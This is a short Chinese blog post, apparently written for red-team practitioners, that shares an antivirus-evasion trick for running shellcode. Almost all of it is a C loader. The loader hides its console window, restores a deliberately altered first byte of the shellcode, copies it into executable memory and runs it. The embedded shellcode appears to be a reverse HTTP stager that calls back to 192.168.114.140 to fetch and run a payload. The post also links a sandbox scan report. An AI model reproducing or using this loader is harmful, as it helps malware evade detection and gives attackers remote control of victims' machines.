最近断更了,是什么让我们饱经风霜,无奈断更,是xx,师傅们都去各地就位了,文章也就少了起来,今天分享个小技巧。
该方法仅为抛砖引玉,毕竟老方法,作用不大。
原理,更改shellcode前几位,然后加载时重置。
直接上代码:
代码语言:javascript复制#include "windows.h"
int main(int argc,char * argv[]) {
::ShowWindow(::GetConsoleWindow(),SW_HIDE);
unsigned char shellcode[]= "xfexe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4c"
"x77x26x07xffxd5x31xdbx53x53x53x53x53x68x3ax56"
"x79xa7xffxd5x53x53x6ax03x53x53x68xb3x15x00x00"
"xe8x6ax01x00x00x2fx57x65x56x69x48x48x4ex41x6f"
"x4fx51x36x76x54x75x38x59x37x52x73x4dx41x38x68"
"x72x6ax33x30x67x39x42x41x6cx42x35x66x45x68x33"
"x66x2dx65x68x69x6ex46x42x33x45x4dx59x59x79x7a"
"x46x34x53x34x6cx50x74x4fx57x6ax4ex63x46x6bx6f"
"x73x47x6ex70x53x50x53x6ex33x64x73x53x7ax6ex2d"
"x41x2dx50x56x39x74x2dx6fx58x4fx56x45x30x47x55"
"x61x63x34x61x41x68x42x53x67x57x58x69x6cx71x52"
"x33x6bx6bx59x59x56x63x42x4dx37x75x79x4fx70x38"
"x45x5fx4dx70x44x30x35x39x4bx4bx6bx4bx49x6cx6a"
"x48x51x50x2dx4dx32x75x64x4ex58x47x63x51x35x5a"
"x4bx49x41x42x43x59x6fx55x72x53x77x34x4ex59x35"
"x48x46x41x49x78x63x63x41x69x73x6cx43x4cx44x76"
"x57x5fx77x64x32x67x39x68x4dx51x54x31x39x50x50"
"x50x53x41x41x4fx51x55x6bx68x4ex63x56x46x7ax2d"
"x4cx4ax47x38x52x58x38x61x6fx4cx6bx2dx4bx34x77"
"x46x48x72x00x50x68x57x89x9fxc6xffxd5x89xc6x53"
"x68x00x02x60x84x53x53x53x57x53x56x68xebx55x2e"
"x3bxffxd5x96x6ax0ax5fx53x53x53x53x56x68x2dx06"
"x18x7bxffxd5x85xc0x75x14x68x88x13x00x00x68x44"
"xf0x35xe0xffxd5x4fx75xe1xe8x4cx00x00x00x6ax40"
"x68x00x10x00x00x68x00x00x40x00x53x68x58xa4x53"
"xe5xffxd5x93x53x53x89xe7x57x68x00x20x00x00x53"
"x56x68x12x96x89xe2xffxd5x85xc0x74xcfx8bx07x01"
"xc3x85xc0x75xe5x58xc3x5fxe8x7fxffxffxffx31x39"
"x32x2ex31x36x38x2ex31x31x34x2ex31x34x30x00xbb"
"xf0xb5xa2x56x6ax00x53xffxd5";
char fisrt[] = "xfc";
void *exec = VirtualAlloc(0,sizeof shellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
memcpy(shellcode,fisrt,1);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}微步在线查杀结果地址:
https://s.threatbook.cn/report/file/4c806570e9b97eeb98e435ca5a8cb260186af96abebeb216c8ecb9c3faa6597a/?sign=history&env=win7_sp1_enx86_office2013
最后祝各位师傅,hw顺利。
